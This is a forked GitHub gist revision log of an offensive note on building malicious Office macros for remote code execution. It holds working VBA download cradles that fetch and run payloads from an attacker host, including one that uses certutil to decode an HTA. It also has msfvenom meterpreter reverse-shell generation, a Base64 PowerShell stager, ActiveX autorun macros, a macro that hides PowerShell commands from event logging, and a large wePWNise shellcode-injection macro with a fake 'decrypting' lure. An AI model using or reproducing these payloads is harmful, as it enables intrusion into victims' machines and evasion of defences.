Skip to content

Instantly share code, notes, and snippets.

@dannymas

dannymas/Various-Macro-Based-RCEs.md

Forked from shantanu561993/Various-Macro-Based-RCEs.md
Created August 31, 2021 19:16
Show Gist options
  • Save dannymas/e68da2def9cf7ff1c900bd337fc2d472 to your computer and use it in GitHub Desktop.
Save dannymas/e68da2def9cf7ff1c900bd337fc2d472 to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. @mgeeky mgeeky revised this gist Jan 21, 2018. 1 changed file with 63 additions and 3 deletions.
    66 changes: 63 additions & 3 deletions Various-Macro-Based-RCEs.md
    View file
    Original file line number Diff line number Diff line change
    @@ -1,4 +1,4 @@
    This is a note for myself describing various Visual Basic macros construction techniques that could be used for remote code execution via malicious Document vector.
    This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector.
    Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.


    @@ -16,6 +16,7 @@ List:
    7. `wePWNise` architecture-independent Macro dynamically bypassing SRPs+EMET
    8. Custom macro taking commands from *Author property* to feed them to `StdIn` of Powershell
    9. ActiveX-based (`InkPicture` control, `Painted` event) autorun macro
    10. Generate Base64-encoded HTA application to be decoded using `certutil`


    ---
    @@ -1078,7 +1079,7 @@ Final size of psh-cmd file: 6151 bytes

    Then we take that commands, base64-decode them and put into Author property. That's all.

    --
    ---

    **9. ActiveX-based (`InkPicture` control, `Painted` event) autorun macro**

    @@ -1106,4 +1107,63 @@ Microsoft InkPicture Control | InkPicture1_Painting
    System Monitor Control | SystemMonitor1_GotFocus
    . | SystemMonitor1_LostFocus
    Microsoft Web Browser | WebBrowser1_BeforeNavigate2
    . | many others...
    . | many others...


    ---

    **10. Generate Base64-encoded HTA application to be decoded using `certutil`**

    In this scenario, we are going to generate a file (like HTA application - which has relatively low detection rate by AVs and HIPSes) - then download it via *Powershell*-based Download Cradle, then pass it to `certutil` to make it Base64 decode that file and launch what has been decoded.

    **Step #1: Generate proper CRT file**

    To do this, we can use below script (modification is required to make `msfvenom` return proper payload):
    ```
    #!/bin/bash
    # --- PAYLOAD SETUP
    LHOST=192.168.56.101
    LPORT=4444
    PAYLOAD=windows/meterpreter/reverse_tcp
    # This file must have *.crt extension
    OUTPUT_FILE=/var/www/html/encoded.crt
    PAYLOAD_FILE=/tmp/test$RANDOM
    # ----
    msfvenom -f hta-psh -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -o $PAYLOAD_FILE
    echo -----BEGIN CERTIFICATE----- > $OUTPUT_FILE
    cat $PAYLOAD_FILE | base64 -w 0 >> $OUTPUT_FILE
    echo -----END CERTIFICATE----- >> $OUTPUT_FILE
    chown www-data:www-data $OUTPUT_FILE 2> /dev/null
    echo "Generated file: $OUTPUT_FILE"
    ```

    Then, having such file placed on our HTTP server - we are going to prepare Download-Cradle macro:

    ```
    Sub DownloadAndExec()
    Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
    Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
    xHttp.Open "GET", "https://<attacker>/encoded.crt", False
    xHttp.Send
    With bStrm
    .Type = 1
    .Open
    .write xHttp.responseBody
    .savetofile "encoded.crt", 2
    End With
    Shell ("cmd /c certutil -decode encoded.crt encoded.hta & start encoded.hta")
    End Sub
    ```
  2. @mgeeky mgeeky revised this gist Jan 21, 2018. 1 changed file with 4 additions and 4 deletions.
    8 changes: 4 additions & 4 deletions Various-Macro-Based-RCEs.md
    View file
    Original file line number Diff line number Diff line change
    @@ -14,8 +14,8 @@ List:
    5. `Empire` generated `windows/macro` stager
    6. Using `Veil-Evasion` generated _powershell.exe_ command within `Luckystrike` generated macro
    7. `wePWNise` architecture-independent Macro dynamically bypassing SRPs+EMET
    8. Custom macro taking commands from Author property to feed them to StdIn of Powershell
    9. ActiveX-based (InkPicture control, Painted event) autorun macro
    8. Custom macro taking commands from *Author property* to feed them to `StdIn` of Powershell
    9. ActiveX-based (`InkPicture` control, `Painted` event) autorun macro


    ---
    @@ -1041,7 +1041,7 @@ End Sub

    ---

    **8. Custom macro taking commands from Author property to feed them to StdIn of Powershell**
    **8. Custom macro taking commands from *Author property* to feed them to `StdIn` of Powershell**

    In this scenario, we set up a Macro that will take it's commands from Author property (or any other) and then pass it to *StdIn* of *Powershell* interpreter to avoid command logging in Event Logs of Windows:

    @@ -1080,7 +1080,7 @@ Then we take that commands, base64-decode them and put into Author property. Tha

    --

    **9. ActiveX-based (InkPicture control, Painted event) autorun macro**
    **9. ActiveX-based (`InkPicture` control, `Painted` event) autorun macro**

    One can also go to *Developer tab on ribbon -> Insert -> More Controls -> Microsoft InkPicture Control*
    Then add such a control and double-click on it. This will pop up macro edit window, where one could put one of the above stated macros, or similar to the one below:
  3. @mgeeky mgeeky revised this gist Jan 21, 2018. 1 changed file with 6 additions and 6 deletions.
    12 changes: 6 additions & 6 deletions Various-Macro-Based-RCEs.md
    View file
    Original file line number Diff line number Diff line change
    @@ -15,7 +15,7 @@ List:
    6. Using `Veil-Evasion` generated _powershell.exe_ command within `Luckystrike` generated macro
    7. `wePWNise` architecture-independent Macro dynamically bypassing SRPs+EMET
    8. Custom macro taking commands from Author property to feed them to StdIn of Powershell
    9. ActiveX-based (InkEdit control) autorun macro
    9. ActiveX-based (InkPicture control, Painted event) autorun macro


    ---
    @@ -1080,13 +1080,13 @@ Then we take that commands, base64-decode them and put into Author property. Tha

    --

    **9. ActiveX-based (InkEdit control) autorun macro**
    **9. ActiveX-based (InkPicture control, Painted event) autorun macro**

    One can also go to *Developer tab on ribbon -> Insert -> More Controls -> Microsoft InkEdit Control*
    One can also go to *Developer tab on ribbon -> Insert -> More Controls -> Microsoft InkPicture Control*
    Then add such a control and double-click on it. This will pop up macro edit window, where one could put one of the above stated macros, or similar to the one below:

    ```
    Sub InkEdit1_GotFocus()
    Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
    Run = Shell("cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile('https://<host>/file.exe','file.exe');Start-Process 'file.exe'", vbNormalFocus)
    End Sub
    ```
    @@ -1100,8 +1100,8 @@ Microsoft Forms 2.0 Frame | Frame1_Layout
    Microsoft Forms 2.0 MultiPage | MultiPage1_Layout
    Microsoft ImageComboBox Control, ver6.0 | ImageCombo21_Change
    Microsoft InkEdit Control | InkEdit1_GotFocus
    Microsoft InkPicture Control | InkPicture1_Painted
    . | InkPicture1_Painting
    . | InkPicture1_Painted
    Microsoft InkPicture Control | InkPicture1_Painting
    . | InkPicture1_Resize
    System Monitor Control | SystemMonitor1_GotFocus
    . | SystemMonitor1_LostFocus
  4. @mgeeky mgeeky revised this gist Jan 21, 2018. 1 changed file with 4 additions and 4 deletions.
    8 changes: 4 additions & 4 deletions Various-Macro-Based-RCEs.md
    View file
    Original file line number Diff line number Diff line change
    @@ -1101,9 +1101,9 @@ Microsoft Forms 2.0 MultiPage | MultiPage1_Layout
    Microsoft ImageComboBox Control, ver6.0 | ImageCombo21_Change
    Microsoft InkEdit Control | InkEdit1_GotFocus
    Microsoft InkPicture Control | InkPicture1_Painted
    - | InkPicture1_Painting
    - | InkPicture1_Resize
    . | InkPicture1_Painting
    . | InkPicture1_Resize
    System Monitor Control | SystemMonitor1_GotFocus
    - | SystemMonitor1_LostFocus
    . | SystemMonitor1_LostFocus
    Microsoft Web Browser | WebBrowser1_BeforeNavigate2
    - | many others...
    . | many others...
  5. @mgeeky mgeeky revised this gist Jan 21, 2018. 1 changed file with 18 additions and 1 deletion.
    19 changes: 18 additions & 1 deletion Various-Macro-Based-RCEs.md
    View file
    Original file line number Diff line number Diff line change
    @@ -1089,4 +1089,21 @@ Then add such a control and double-click on it. This will pop up macro edit wind
    Sub InkEdit1_GotFocus()
    Run = Shell("cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile('https://<host>/file.exe','file.exe');Start-Process 'file.exe'", vbNormalFocus)
    End Sub
    ```
    ```

    For other Macro-autorun related ActiveX controls and their methods - one can refer to the below resource:
    http://www.greyhathacker.net/?p=948

    ActiveX Control | Subroutine name
    --- | ---
    Microsoft Forms 2.0 Frame | Frame1_Layout
    Microsoft Forms 2.0 MultiPage | MultiPage1_Layout
    Microsoft ImageComboBox Control, ver6.0 | ImageCombo21_Change
    Microsoft InkEdit Control | InkEdit1_GotFocus
    Microsoft InkPicture Control | InkPicture1_Painted
    - | InkPicture1_Painting
    - | InkPicture1_Resize
    System Monitor Control | SystemMonitor1_GotFocus
    - | SystemMonitor1_LostFocus
    Microsoft Web Browser | WebBrowser1_BeforeNavigate2
    - | many others...
  6. @mgeeky mgeeky revised this gist Jan 21, 2018. 1 changed file with 15 additions and 1 deletion.
    16 changes: 15 additions & 1 deletion Various-Macro-Based-RCEs.md
    View file
    Original file line number Diff line number Diff line change
    @@ -15,6 +15,7 @@ List:
    6. Using `Veil-Evasion` generated _powershell.exe_ command within `Luckystrike` generated macro
    7. `wePWNise` architecture-independent Macro dynamically bypassing SRPs+EMET
    8. Custom macro taking commands from Author property to feed them to StdIn of Powershell
    9. ActiveX-based (InkEdit control) autorun macro


    ---
    @@ -1075,4 +1076,17 @@ Final size of psh-cmd file: 6151 bytes
    %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEATABmAFgAWgBGAG8AQwBBADcAVgBXAGIAWQAvAGEATwBCAEQAKwB2 ...
    ```

    Then we take that commands, base64-decode them and put into Author property. That's all.
    Then we take that commands, base64-decode them and put into Author property. That's all.

    --

    **9. ActiveX-based (InkEdit control) autorun macro**

    One can also go to *Developer tab on ribbon -> Insert -> More Controls -> Microsoft InkEdit Control*
    Then add such a control and double-click on it. This will pop up macro edit window, where one could put one of the above stated macros, or similar to the one below:

    ```
    Sub InkEdit1_GotFocus()
    Run = Shell("cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile('https://<host>/file.exe','file.exe');Start-Process 'file.exe'", vbNormalFocus)
    End Sub
    ```
  7. @mgeeky mgeeky revised this gist Jan 21, 2018. 1 changed file with 38 additions and 0 deletions.
    38 changes: 38 additions & 0 deletions Various-Macro-Based-RCEs.md
    View file
    Original file line number Diff line number Diff line change
    @@ -14,6 +14,7 @@ List:
    5. `Empire` generated `windows/macro` stager
    6. Using `Veil-Evasion` generated _powershell.exe_ command within `Luckystrike` generated macro
    7. `wePWNise` architecture-independent Macro dynamically bypassing SRPs+EMET
    8. Custom macro taking commands from Author property to feed them to StdIn of Powershell


    ---
    @@ -1038,3 +1039,40 @@ End Sub
    ```

    ---

    **8. Custom macro taking commands from Author property to feed them to StdIn of Powershell**

    In this scenario, we set up a Macro that will take it's commands from Author property (or any other) and then pass it to *StdIn* of *Powershell* interpreter to avoid command logging in Event Logs of Windows:

    **Step #1:**
    Put the following macro (or modify it in some way)

    ```
    Private Sub Workbook_Open()
    Dim author As String
    author = ActiveWorkbook.BuiltinDocumentProperties("Author")
    Dim ws As Object
    Set ws = CreateObject("WScript.Shell")
    With ws.Exec("powershell.exe -nop -WindowStyle hidden -Command -")
    .StdIn.WriteLine author
    .StdIn.WriteBlankLines 1
    .Terminate
    End With
    End Sub
    ```

    Then place some not Base64 encoded Powershell commands in Author property of document's. Macro could be easily generated for instance using **msfvenom**:

    ```
    work|19:10|~ # msfvenom -f psh-cmd LHOST=192.168.56.101 LPORT=4444
    No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    No Arch selected, selecting Arch: x86 from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 333 bytes
    Final size of psh-cmd file: 6151 bytes
    %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEATABmAFgAWgBGAG8AQwBBADcAVgBXAGIAWQAvAGEATwBCAEQAKwB2 ...
    ```

    Then we take that commands, base64-decode them and put into Author property. That's all.
  8. @mgeeky mgeeky revised this gist Aug 23, 2017. 1 changed file with 477 additions and 0 deletions.
    477 changes: 477 additions & 0 deletions Various-Macro-Based-RCEs.md
    View file
    Original file line number Diff line number Diff line change
    @@ -13,6 +13,7 @@ List:
    4. Metasploit generated payload `vba-psh`
    5. `Empire` generated `windows/macro` stager
    6. Using `Veil-Evasion` generated _powershell.exe_ command within `Luckystrike` generated macro
    7. `wePWNise` architecture-independent Macro dynamically bypassing SRPs+EMET


    ---
    @@ -560,4 +561,480 @@ And that's all.



    ---


    **7. `wePWNise` architecture-independent Macro dynamically bypassing SRPs+EMET**

    That's something huge actually. The `wePWNise` tool by **MWRLabs** is a tool that embeds previously generated x86 and x64 payloads right into VBS script that itself is capable of enumerating (in the runtime) Software Restriction Policies and EMET policies, finding weak spots and then bypassing those. Everything goes automatically right after executing the macro. This functionality makes the `wePWNise` code quite robust under various enviroment restrictions.

    In order to generate such Macro we have to firstly generate **two** payloads for both: **x86** and **x64** architecture's for instance via `msfvenom`:

    ```
    work|02:47|~/ # msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.56.101 LPORT=443 -f raw -o /tmp/methttps1.raw
    No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    No Arch selected, selecting Arch: x86 from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 408 bytes
    Saved as: /tmp/methttps1.raw
    work|02:48|~/ # msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.56.101 LPORT=443 -f raw -o /tmp/methttps1x64.raw
    No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    No Arch selected, selecting Arch: x64 from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 673 bytes
    Saved as: /tmp/methttps1x64.raw
    ```

    Having those two, we can proceed to actual VBA code generation with command:

    ```
    work|02:48|~/ # python wepwnise.py -i86 /tmp/methttps1.raw -i64 /tmp/methttps1x64.raw --out /tmp/wepwnise.txt
    ```

    Which will result in the following Macro code:

    ```
    Private Const PROCESS_ALL_ACCESS = &H1F0FFF
    Private Const MEM_COMMIT = &H1000
    Private Const MEM_RELEASE = &H8000
    Private Const PAGE_READWRITE = &H40
    Private Const HKEY_LOCAL_MACHINE = &H80000002
    Private Const PROCESSOR_ARCHITECTURE_AMD64 = 9
    Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadId As Long
    End Type
    Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
    End Type
    #If VBA7 Then 'x64 office
    Private Declare PtrSafe Function bodyslam Lib "kernel32" Alias "TerminateProcess" (ByVal hProcess As Long, ByVal uExitCode As Long) As Boolean
    Private Declare PtrSafe Function watergun Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function leechseed Lib "kernel32" Alias "VirtualFreeEx" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal dwFreeType As Long) As LongPtr
    Private Declare PtrSafe Function thunderbolt Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lpBaseAddress As LongPtr, ByRef lpBuffer As Any, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As LongPtr) As LongPtr
    Private Declare PtrSafe Function flamethrower Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Any, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As LongPtr
    Private Declare PtrSafe Sub pokedex Lib "kernel32" Alias "GetSystemInfo" (lpSystemInfo As SYSTEM_INFO)
    Private Declare PtrSafe Function cosmicpower Lib "kernel32" Alias "GetCurrentProcess" () As LongPtr
    Private Declare PtrSafe Function rarecandy Lib "kernel32" Alias "IsWow64Process" (ByVal hProcess As LongPtr, ByRef Wow64Process As Boolean) As Boolean
    Private Declare PtrSafe Function dragonascent Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, ByVal lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
    Private Type SYSTEM_INFO
    wProcessorArchitecture As Integer
    wReserved As Integer
    dwPageSize As Long
    lpMinimumApplicationAddress As LongPtr
    lpMaximumApplicationAddress As LongPtr
    dwActiveProcessorMask As LongPtr
    dwNumberOrfProcessors As Long
    dwProcessorType As Long
    dwAllocationGranularity As Long
    wProcessorLevel As Integer
    wProcessorRevision As Integer
    End Type
    #Else
    Private Declare Function bodyslam Lib "kernel32" Alias "TerminateProcess" (ByVal hProcess As Long, ByVal uExitCode As Long) As Boolean
    Private Declare Function watergun Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddress As Any, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    Private Declare Function leechseed Lib "kernel32" Alias "VirtualFreeEx" (ByVal hProcess As Long, ByVal lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
    Private Declare Function thunderbolt Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByRef lpBuffer As Any, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long
    Private Declare Function flamethrower Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Any, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long
    Private Declare Sub pokedex Lib "kernel32" Alias "GetSystemInfo" (lpSystemInfo As SYSTEM_INFO)
    Private Declare Function cosmicpower Lib "kernel32" Alias "GetCurrentProcess" () As Long
    Private Declare Function rarecandy Lib "kernel32" Alias "IsWow64Process" (ByVal hProcess As Long, ByRef Wow64Process As Boolean) As Boolean
    Private Declare Function dragonascent Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
    Private Type SYSTEM_INFO
    wProcessorArchitecture As Integer
    wReserved As Integer
    dwPageSize As Long
    lpMinimumApplicationAddress As Long
    lpMaximumApplicationAddress As Long
    dwActiveProcessorMask As Long
    dwNumberOrfProcessors As Long
    dwProcessorType As Long
    dwAllocationGranularity As Long
    dwReserved As Long
    End Type
    #End If
    Dim inject64 As Boolean
    Public Function IsOffice64Bit() As Boolean
    Dim lpSystemInfo As SYSTEM_INFO
    Call pokedex(lpSystemInfo)
    If lpSystemInfo.wProcessorArchitecture = PROCESSOR_ARCHITECTURE_AMD64 Then
    Call rarecandy(cosmicpower(), IsOffice64Bit)
    IsOffice64Bit = Not IsOffice64Bit
    End If
    End Function
    Public Function IsWow64(handle As Long) As Boolean
    Call rarecandy(handle, meh)
    IsWow64 = Not meh
    End Function
    Public Function DieTotal()
    MsgBox "This document will begin decrypting, please allow up to 5 minutes"
    End Function
    Public Function TrailingSlash(strFolder As String) As String
    If Len(strFolder) > 0 Then
    If Right(strFolder, 1) = "\" Then
    TrailingSlash = strFolder
    Else
    TrailingSlash = strFolder & "\"
    End If
    End If
    End Function
    Public Function RecursiveDir(colFiles As Collection, strFolder As String, strFileSpec As String, bIncludeSubfolders As Boolean)
    Dim strTemp As String
    Dim colFolders As New Collection
    Dim vFolderName As Variant
    strFolder = TrailingSlash(strFolder)
    On Error Resume Next
    strTemp = Dir(strFolder & strFileSpec)
    Do While strTemp <> vbNullString
    colFiles.Add strFolder & strTemp
    strTemp = Dir
    Loop
    If bIncludeSubfolders Then
    strTemp = Dir(strFolder, vbDirectory)
    Do While strTemp <> vbNullString
    If (strTemp <> ".") And (strTemp <> "..") Then
    If (GetAttr(strFolder & strTemp) And vbDirectory) <> 0 Then
    colFolders.Add strTemp
    End If
    End If
    strTemp = Dir
    Loop
    For Each vFolderName In colFolders
    Call RecursiveDir(colFiles, strFolder & vFolderName, strFileSpec, True)
    Next vFolderName
    End If
    End Function
    Public Function getList() As String()
    Dim myList As String
    myList = ""
    myList = myList & "ping.exe /t 127.0.0.1" & ","
    myList = myList & "C:\Program Files (x86)\EMET 5.5\EMET_Agent.exe" & ","
    myList = myList & "hh.exe /?" & ","
    myList = myList & "regedit.exe" & ","
    myList = myList & "cmd.exe /K" & ","
    myList = myList & "xpsrchvw.exe" & ","
    myList = myList & "xcopy.exe * /w" & ","
    myList = myList & "wscript.exe" & ","
    myList = myList & "netstat.exe -aneft 100" & ","
    myList = myList & "netsh.exe" & ","
    myList = myList & "winver.exe" & ","
    myList = myList & "windowsanytimeupgradeui.exe" & ","
    myList = myList & "wfs.exe" & ","
    myList = myList & "waitfor.exe statusready" & ","
    myList = myList & "verifier.exe" & ","
    myList = myList & "timeout.exe -1" & ","
    myList = myList & "soundrecorder.exe" & ","
    myList = myList & "sndvol.exe" & ","
    myList = myList & "rasphone.exe" & ","
    myList = myList & "nslookup.exe" & ","
    myList = myList & "mstsc.exe" & ","
    myList = myList & "wmic.exe" & ","
    myList = myList & "C:\\windows\\system32\\speech\\speechux\\speechuxtutorial.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\Ping.exe -t 127.0.0.1" & ","
    myList = myList & "wmic.exe" & ","
    myList = myList & "C:\Windows\bfsvc.exe" & ","
    myList = myList & "C:\Windows\explorer.exe" & ","
    myList = myList & "C:\Windows\fveupdate.exe" & ","
    myList = myList & "C:\Windows\HelpPane.exe" & ","
    ' Cut for brevity
    [...]
    myList = myList & "C:\Windows\System32\wbem\wbemtest.exe" & ","
    myList = myList & "C:\Windows\System32\wbem\WinMgmt.exe" & ","
    myList = myList & "C:\Windows\System32\wbem\WMIADAP.exe" & ","
    myList = myList & "C:\Windows\System32\wbem\WmiApSrv.exe" & ","
    myList = myList & "C:\Windows\System32\wbem\WMIC.exe" & ","
    myList = myList & "C:\Windows\System32\wbem\WmiPrvSE.exe" & ","
    myList = myList & "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & ","
    myList = myList & "C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\AdapterTroubleshooter.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\ARP.EXE" & ","
    myList = myList & "C:\Windows\SysWOW64\at.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\AtBroker.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\attrib.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\auditpol.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\autochk.exe" & ","
    ' Cut for brevity
    [...]
    myList = myList & "C:\Windows\SysWOW64\InstallShield\setup.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\InstallShield\_isdel.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\migwiz\mighost.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\migwiz\MigSetup.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\migwiz\migwiz.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\migwiz\PostMig.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\wbem\mofcomp.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\wbem\WinMgmt.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\wbem\WMIADAP.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\wbem\WMIC.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\wbem\WmiPrvSE.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe" & ","
    myArray = Split(myList, ",")
    Dim c As Integer
    Dim list() As String
    For c = LBound(myArray) To (UBound(myArray) - 1)
    ReDim Preserve list(c)
    list(c) = myArray(c)
    Next
    c = UBound(list)
    Dim colFiles As New Collection
    RecursiveDir colFiles, "C:\Program Files", "*.exe", True
    RecursiveDir colFiles, "C:\Program Files (x86)", "*.exe", True
    RecursiveDir colFiles, "C:\Intel", "*.exe", True
    RecursiveDir colFiles, "C:\Windows\Syswow64", "*.exe", True
    RecursiveDir colFiles, "C:\Windows\System32", "*.exe", True
    RecursiveDir colFiles, "C:\Windows\winsxs", "*.exe", True
    RecursiveDir colFiles, "C:\Windows\System32\DriverStore\FileRepository", "*.exe", True
    RecursiveDir colFiles, "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Workflow.Compiler\", "*.exe", True
    RecursiveDir colFiles, "C:\Windows\Microsoft.NET\Framework\", "*.exe", True
    Dim vFile As Variant
    For Each vFile In colFiles
    ReDim Preserve list(c)
    list(c) = vFile
    c = c + 1
    Next vFile
    getList = list
    End Function
    Public Function pathOf(program As String) As String
    pathOf = ""
    If program Like "*.exe" Then
    program = program
    Else
    program = program & ".exe"
    End If
    If program Like "*:\*" Then
    pathOf = program
    Exit Function
    Else
    paths = Environ("PATH")
    Dim allPaths() As String
    allPaths = Split(paths, ";")
    Dim Path As Variant
    For Each Path In allPaths
    ' With more complex env variables - esp complex path set - need to do some tidying or quote errors
    If Right(Path, 1) = Chr(34) Then 'Check if string ends with a quote
    ms = Mid(Path, 2, Len(Path) - 2) & "\" & program
    Else
    ms = Path & "\" & program
    End If
    If Not Dir(ms, vbDirectory) = vbNullString Then
    pathOf = ms
    Exit Function
    End If
    Next
    End If
    End Function
    Public Function getEMET() As String()
